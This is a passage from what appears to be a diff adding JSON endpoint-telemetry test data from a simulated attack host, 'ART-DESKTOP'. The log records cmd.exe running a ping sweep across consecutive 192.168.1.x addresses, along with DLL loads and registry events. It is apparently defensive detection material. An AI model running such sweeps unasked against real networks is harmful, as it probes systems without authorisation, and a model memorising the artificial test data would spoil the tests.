"ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": 
"{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "process", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572311840000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.68", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5260, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572312010000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + 
}, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572312140000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883572314170000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883572314170000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883572314170000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": 
"C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883572315420000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883572315580000, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883572315580000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000002E021A", + 
"registry_value": "W32:00000000002E021A", + "timestamp": 131883572316050000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000002E021A", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000002E021A\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883572316050000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572316840000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.69", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7640, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572316990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": 
"ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7640, + "process_name": "PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "process", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.70", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1572, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572317560000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": 
"C:\\Windows\\System32\\PING.EXE", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317610000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317610000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317610000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "process", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572321840000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.71", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5420, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 
131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "process", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572326830000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.72", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4564, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572327000000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": 